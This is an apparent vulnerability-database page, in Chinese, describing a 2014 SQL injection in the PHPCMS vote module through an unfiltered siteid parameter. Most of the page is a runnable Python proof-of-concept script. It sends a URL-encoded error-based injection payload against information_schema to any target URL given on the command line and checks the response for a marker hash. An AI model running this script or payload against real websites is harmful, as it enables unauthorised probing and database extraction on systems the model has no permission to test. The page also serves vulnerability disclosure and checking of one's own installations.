欢迎致电:4000-600-654服务时间:9:00 - 21:00

PHPCMS投票模块SQL注入

漏洞信息

漏洞编号:JDSEC-POC-20141204-4238

漏洞名称:PHPCMS投票模块SQL注入

提交作者:5up3rc

提交日期:2014-12-04 20:09:41

信息来源:http://www.sebug.net

漏洞描述

投票模块siteid未过滤导致SQL注入

POC详情

#!/usr/bin/env python
# coding=utf-8

import sys
import requests

def scan(target):
	info = {
	'name':u'phpcms投票模块SQL注入',
	'date':'2014-12-4',
	'author':'5up3rc',
	'poc':'/index.php?m=vote&c=index&a=lists&siteid=1%27%61%6E%64%28%73%65%6C%65%63%74%20%31%20%66%72%6F%6D%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%2C%63%6F%6E%63%61%74%28%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%63%6F%6E%63%61%74%28%30%78%33%61%2C%30%78%33%61%2C%6D%64%35%28%33%2E%31%34%31%35%29%29%29%29%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%6C%69%6D%69%74%20%30%2C%31%29%2C%66%6C%6F%6F%72%28%72%61%6E%64%28%30%29%2A%32%29%29%78%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%67%72%6F%75%70%20%62%79%20%78%29%61%29%23'
	}
	headers = {
	'User-Agent':'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',
	'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'	
	}
	audit_request = requests.get(target + info['poc'],headers=headers)
	audit_request.close()
	if audit_request.status_code == 200:
		if audit_request.text.find('63e1f04640e83605c1d177544a5a0488') !=-1:
			print u'[!]audit success'
			print '[*]' + target + info['poc']
		else:
			print u'[!]audit error'
	else:
		print 'connection error'
			

if __name__ == '__main__':

    if len(sys.argv) < 2:
    	print "Usage: python vote_sqli.py [target]\n"
        print "Example: python vote_sqli.py  http://www.xxx.com\n"
        sys.exit(1)
    else:
    	target = sys.argv[1].lower()
    scan(target)